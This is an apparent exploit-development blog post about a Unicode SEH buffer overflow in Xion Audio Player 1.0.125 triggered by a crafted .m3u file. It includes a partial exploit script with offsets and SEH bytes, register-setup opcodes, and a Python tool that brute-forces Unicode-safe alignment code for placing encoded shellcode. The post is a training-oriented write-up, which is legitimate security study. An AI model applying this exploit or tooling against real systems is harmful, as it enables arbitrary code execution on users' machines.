Automated generation of code alignment code for Unicode buffer overflow exploitation

Update: Implemented an advanced version for

Puh, I know, long title. So as I was going through my corelan training material again, I was trying to exploit the public Xion exploit that can be found on exploit-db (please read the exploit first). As I can’t cover all the basics in this blog posts, here just a short overview of the exploit:

  • Exploits Xion Audio Player version 1.0.125 when opening an m3u file
  • Extremely straight forward, write 5000 A’s to a file, change extension to .m3u, open with Xion player, boom!
  • It’s an SEH exploit. So we control one of the exception handlers. It’s Unicode, so if you use corelan’s mona, use things like !mona seh -cp unicode. Unicode exploits are a little bit tricky, you often get null bytes, the presentation of FX about Unicode exploiting helped a lot.

Ok, let’s assume you already did the SEH exploiting and got code execution. So if you want to play from this point, here’s the exploit so far (simply hits our garbage). All the steps starting from this script are explained in the video below (although you might need to know how to change the offset to SEH by injecting a cycling patter, because the .m3u path length matters):

import subprocess
overflow_length = 5000
offset = 237 #Attention: changes with path length of the m3u file!
seh_handler = "\x93\x47" #will be transformed to 0047201C and at that address there is a POP; POP; RET;. This means we can jump to seh_nextrecord and execute it. Set breakpoint on this SEH handler!
seh_nextrecord = "\x50\x6d" #Serves as a kind of "NOP" here
garbage = "B"
junk = "A"*offset+seh_nextrecord+seh_handler+garbage*(overflow_length-offset-len(seh_nextrecord)-len(seh_handler))

payload = junk
dbg = "C:\\Program Files\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe"
exploitable_exe = "C:\\Program Files\\r2 Studios\\Xion\\Xion.exe"
exploit_file = "C:\\testig101\\test\\theUnicode\\exploit.m3u"

So now we’re at the point where we want to run shellcode. Usual shellcodes can not be used in Unicode environments, therefore we need to use an encoder, for example the Alpha3 encoder. Now the thing with encoders is that they normally use a GetPC routine or a BufferRegister to locate themselves in memory. GetPC is not compatible with Unicode, so we have to use a BufferRegister. A BufferRegister means nothing else than writing the address of the location of the first byte of the shellcode into a register and telling the shellcode which register it is. To achieve this goal, we need to write an alignment code that is Unicode compliant itself.

Now we come to the core part of this post: Writing alignment code. How do we write the correct address into the register? So far this involved some manual work. We have to find Unicode compatible opcodes. We can look at the transformation tables in FX’s presentation, but for a lot of characters this means we inject “\x41” and it will be transformed to “\x41\x00”. So which opcodes of the x86 assembler language have null bytes in it? Even worse, for most of our injections the opcodes must have a null byte every second byte. Or at least we have to get rid of those zero bytes.

I checked on the metasm shell (included in the Metasploit framework under the tools folder) and found out that all ADD operations with 4 byte registers (ah, al, bh, bl, etc.) start with a zero byte:

metasm > add ah,bl

So because I’m a lazy guy and don’t want to do the manual work, I wrote a program that will write the alignment code for me and hopefully for everybody else in the future.

Here are the steps that have to be done if you want to use my script:

  1. Make sure the first four bytes of the BufferRegister are correct (not part of the script).
  2. Get some reliable values into EAX, ECX, EDX, EBX with as few null bytes in it as possible (not part of the script).
  3. Tell my script the value of the EAX, ECX, EDX, EBX registers when the debugger stops exactly at the position where the alignment code will start. Additionally tell the script the address of the start of the alignment code (the current EIP).
  4. Run the script. It uses a random “heuristic” (well, bruteforcing with random inputs). So far I always got the single best result (with this approach) when I run it at least 1 minute. An alignment code that is a little longer is normally found in a couple of seconds.
  5. Stop the script (Ctrl+C) when you waited long enough and think there will be no shorter result. Copy the best/shortest/last alignment code into the metasm shell to get opcodes in hex.
  6. Remove the null bytes from the alignment code (they get injected in the Unicode transformation).
  7. Inject the alignment code, add your produced Unicode shellcode, pwn!

The idea is to calculate the correct value where our shellcode lies. But if the shellcode is put directly after the alignment code, every additional instruction in the alignment code will increase our “target” address we want to have in our BufferRegister. This means we don’t know the location from the beginning, but have to calculate it. Until now the approach was to chose an address that is enough far away and then jump to that address at the end of the alignment code. This script finds better solutions. The script does nothing else than trying to sum up the different bytes of AH, AL, BH, BL etc. and try to find the correct value, always keeping track on how many instructions are already needed and adjusting the “target” address where the shellcode will live. So far the theory. Some more theory, the math modell behind:

written by floyd -
all rights reserved

We are talking about a problem in GF(256). In other words the numbers are modulo 256. Or for the 
IT people: A byte that wraps around (0xFFFFFFFE + 0x00000002 = 0x00000001).

Let's first discuss a simple example with 8 inputs (a1..a8). We need the more general case, 
but so far 8 inputs is the maximum that makes sense. Although it doesn't make any
difference. If we solve the general case with (let's say) 16 Inputs we can
simply set the not needed inputs's to zero and they will be ignored in the model.
The script runs in the general case and can operate in all cases!

Inputs (values): a1, a2, ..., a8 mod 256
Inputs (starts): s1, s2 mod 256
Inputs (targets/goal): g1, g2 mod 256
Outputs: x1, x2, ..., x8, y1, y2, ..., y8 where these are natural numbers (including zero)!

Find (there might be no solution):
s1+a1*x1+a2*x2+a3*x3+a4*x4+a5*x5+a6*x6+a7*x7+a8*x8-((s2+2*(x1+x2+x3+x4+x5+x6+x7+x8+y1+y2+y3+y4+y5+y6+y7+y8)+3)/256) = g1 mod 256
s2+a1*y1+a2*y2+a3*y3+a4*y4+a5*y5+a6*y6+a7*y7+a8*y8-2*(x1+x2+x3+x4+x5+x6+x7+x8+y1+y2+y3+y4+y5+y6+y7+y8)-3 = g2 mod 256

Minimise (sum of outputs):

{a1, a2, ... a8} = {9, 212, 0, 0, 32, 28, 50, 188}
{s1, s2} = {233, 212}
{g1, g2} = {253, 75}

Btw the +3 and -3 in the formula is because we have to get rid of the last zero byte, we do that by injecting
\x6d, which results in 00 6d 00 (serves as a "NOP"), meaning we need to add 3 to the address.

[Extra constraints!]
1. As we first set AH (or whatever higher byte is in start_is) to the correct value
AH has changed until we want to set AL. Therefore the instruction
add al, ah will NOT return the correct result, because we assume an old value
for the AH register! That's why we have a originals (a1...a8) and
modify them to a21, a22, a23, .. a28 (only for y1...y8, for the x values we're fine)
2. Additionally, the following instructions are not allowed (because it would be a lot more
complicated to calculate in advance the state of the register we are modifying):
add ah, ah
add al, al
Solved by overwriting if random generator produced something like that.
3. This program only works if you already managed to get the first
four bytes of the alignment address right (this program operates
only on the last four bytes!)

I would say that the script already works pretty well, although it is not yet tested with a lot of different situations. Enough talking, here is the script:

#written by floyd -
#all rights reserved

#Inputs - later in mona read it from the breakpoint we're at
start_is = ['ah', 'al'] #Means: Our BufferRegister is chosen as aex
start = 0xE9D4 #Nothing else than the last four bytes of our BufferRegister
goal = 0xFD53 #Address of the first byte of the alignment code, but without
              #the setting up of the EAX,EBX,ECX,EDX registers!
              #In other words: the address where the first byte of the here
              #generated code is
#End inputs

#Idea of 0.25: We will add every fourth register to the sum.
#This means in average we will increase by 2 instructions every run of 
MAGIC_PROBABILITY_OF_RESETTING=0.04 #an average of about 40 instructions
MAGIC_MAX_PROBABILITY_OF_RESETTING=0.11 #an average of about 20 instructions
#Idea: This is a trade-off - we don't want
#to find no results by resetting to often (and never even
#trying an instruction length of e.g. 500 bytes). On the other
#hand we don't want to search in solutions with a lot of bytes
#when we already found a shorter solution. Therefore we will
#slightly increase it with time.
#End options - don't modify anything below here!

import pprint, time, random, copy
def main():
    originals = []
    ax = theX(eax)
    ah = higher(ax)
    al = lower(ax)
    bx = theX(ebx)
    bh = higher(bx)
    bl = lower(bx)
    cx = theX(ecx)
    ch = higher(cx)
    cl = lower(cx)
    dx = theX(edx)
    dh = higher(dx)
    dl = lower(dx)
    start_address = theX(start)
    s1 = higher(start_address)
    s2 = lower(start_address)
    goal_address = theX(goal)
    g1 = higher(goal_address)
    g2 = lower(goal_address)
    names = ['ah', 'al', 'bh', 'bl', 'ch', 'cl', 'dh', 'dl']
    originals = [ah, al, bh, bl, ch, cl, dh, dl]
    sanitiseZeros(originals, names)
    #a1, a2, a3, a4, a5, a6, a7, a8 = originals
    #x1, x2, x3, x4, x5, x6, x7, x8 = [0 for i in range(0,8)]
    #y1, y2, y3, y4, y5, y6, y7, y8 = [0 for i in range(0,8)]
    #xs = [x1, x2, x3, x4, x5, x6, x7, x8]
    #ys = [y1, y2, y3, y4, y5, y6, y7, y8]
    xs = [0 for i in range(0,len(originals))]
    ys = [0 for i in range(0,len(originals))]
    #[Extra constraint!] 1.
    #we have to modify the AH value, because it will change until
    #we reach the instruction where we modify AL
    originals2 = copy.copy(originals)
    originals2[names.index(start_is[0])] = g1 #it will be the target value
    best_result = 999999999
    number_of_tries = 0.0
    while True:
        #Hmm, we might have a problem to improve the heuristic (random right now)
        #if we don't put the Extra constraints into the formula
        #[Extra constraint!] 2.
        #not allowed: 
        #add al, al
        #add ah, ah
        xs[names.index(start_is[0])] = 0
        ys[names.index(start_is[1])] = 0
        tmp = check2(originals, originals2, [s1, s2], [g1, g2], xs, ys, best_result)
        if tmp > 0:
            best_result = tmp
            #we got a new result
            printNicely(names, start_is, xs, ys)
        #Slightly increases probability of resetting with time
        probability = MAGIC_PROBABILITY_OF_RESETTING+number_of_tries/(10**8)
        if probability < MAGIC_MAX_PROBABILITY_OF_RESETTING:
            number_of_tries += 1.0
        if random.random() <= probability:
            #print "Reset"
            xs = [0 for i in range(0,len(originals))]
            ys = [0 for i in range(0,len(originals))]

def sanitiseZeros(originals, names):
    for index, i in enumerate(originals):
        if i == 0:
            print """WARNING: Your %s register seems to be zero, for the heuristic it's much healthier
            if none is zero. Although it might still work, it might also not work or take longer.""" % names[index]
            del originals[index]
            del names[index]
            return sanitiseZeros(originals, names)

def randomise(values):
    for index, i in enumerate(values):
            values[index] += 1

def check2(as1, as2, ss, gs, xs, ys, best_result):
    g1, g2 = gs
    s1, s2 = ss
    sum_of_instructions = sum(xs) + sum(ys) 
    if best_result > sum_of_instructions:
        res0 = s1
        res1 = s2
        for index, _ in enumerate(as1):
            res0 += as1[index]*xs[index] % 256
            res1 += as2[index]*ys[index] % 256
        res0 = res0 - ((s2+(2*sum_of_instructions)+3)/256) #+3 for the 6d at the end, which is 006d00 
        res1 = res1 - (2*sum_of_instructions+3) #+3 for the 6d at the end, which is 006d00 
        if g1 == res0 % 256 and g2 == res1 % 256:
            debug("a11...a1?", hexlist(as1))
            debug("a21...a2?", hexlist(as2))
            debug("s1, s2", hexlist(ss))
            debug("g1...g2", hexlist(gs))
            debug("x1...x?", xs)
            debug("y1...y?", ys)
            debug("No of instructions:", sum_of_instructions)
            return sum_of_instructions
    return 0
#Old version of check that doesn't support variable as1/as2 lengths, but
#might just be easier to understand if somebody wants to understand this stuff
# def check(as1, as2, ss, gs, xs, ys, best_result):
#     g1, g2 = gs
#     s1, s2 = ss
#     a11, a12, a13, a14, a15, a16, a17, a18 = as1
#     a21, a22, a23, a24, a25, a26, a27, a28 = as2
#     x1, x2, x3, x4, x5, x6, x7, x8 = xs
#     y1, y2, y3, y4, y5, y6, y7, y8 = ys
#     num_of_instr = x1+x2+x3+x4+x5+x6+x7+x8+y1+y2+y3+y4+y5+y6+y7+y8
#     if best_result > num_of_instr:
#         if (s1+a11*x1+a12*x2+a13*x3+a14*x4+a15*x5+a16*x6+a17*x7+a18*x8-((s2+2*(x1+x2+x3+x4+x5+x6+x7+x8+y1+y2+y3+y4+y5+y6+y7+y8)+3)/256)) % 256 == g1 \
#         and (s2+a21*y1+a22*y2+a23*y3+a24*y4+a25*y5+a26*y6+a27*y7+a28*y8-2*(x1+x2+x3+x4+x5+x6+x7+x8+y1+y2+y3+y4+y5+y6+y7+y8))-3 % 256 == g2:
#             debug("###FOUND")
#             debug("a11...a18", hexlist(as1))
#             debug("a21...a28", hexlist(as2))
#             debug("s1, s2", hexlist(ss))
#             debug("g1...g8", hexlist(gs))
#             debug("x1...x8", xs)
#             debug("y1...y8", ys)
#             debug("No of instructions:", num_of_instr)
#             return num_of_instr
#     return 0

def printNicely(names, start_is, xs, ys):
    #print names, start_is, xs, ys
    resulting_string = ""
    sum_instr = 0
    for index, x in enumerate(xs):
        for k in range(0, x):
            resulting_string += "add "+start_is[0]+","+names[index]+"; "
            sum_instr += 1
    for index, y in enumerate(ys):
        for k in range(y):
            resulting_string += "add "+start_is[1]+","+names[index]+"; "
            sum_instr += 1
    resulting_string += "add [ebp],ch;"
    sum_instr += 1
    result("Use the following instructions (%i long, paste into metasm shell/remove all zero bytes):\n"%sum_instr, resulting_string)

def hexlist(list):
    return [hex(i) for i in list]

def theX(num):
    res = (num>>16)<<16 ^ num
    #print hex(res)
    return res
def higher(num):
    res = num>>8
    #print hex(res)
    return res
def lower(num):
    res = ((num>>8)<<8) ^ num
    #print hex(res)
    return res
def result(*text):
    print "[RESULT] "+str(" ".join(str(i) for i in text))
def debug(*text):
    if False:
        print "[DEBUG] "+str(" ".join(str(i) for i in text))


As I talked to Peter aka corelanc0d3r he liked the idea that we could implement it into mona, although there are a few things that should be changed/added. It is important that we get static and reliable addresses into EAX, ECX, EDX and EBX before we do the math. So in mona the first two steps from above should be integrated as well. Therefore mona should do the following:

  1. Check if EBP is a stackpointer, if yes go to 2. otherwise go to 3.
  2. Pop EBP into EAX: \x55\x6d\x58\6d
  3. Pop ESP into EBX: \x54\x6d\x5B\6d
  4. Find reliable stack pointers on the stack and pop different ones into EDX, ECX (and EAX if 2. was not executed)
  5. Do the math and suggest to user

In a lot of cases this procedure of checking EBP and find reliable stack pointers is probably not necessary. But to get higher reliability for the automated approach it should be done. As Peter pointed out, one of the registers could be filled with a timestamp or something. For now, if you use my script, check for these things manually.

Another good thing I have to point out about this script: We won’t need to jump to the shellcode and we don’t need to put garbage between the alignment code and the shellcode. The script/math model makes sure that the next instruction after the alignment code is exactly where our BufferRegister is pointing to (and where we can put our Unicode shellcode).

Now check out the video describing all the steps and how to use the script:

Go to vimeo to watch the video

Update: Implemented an advanced version for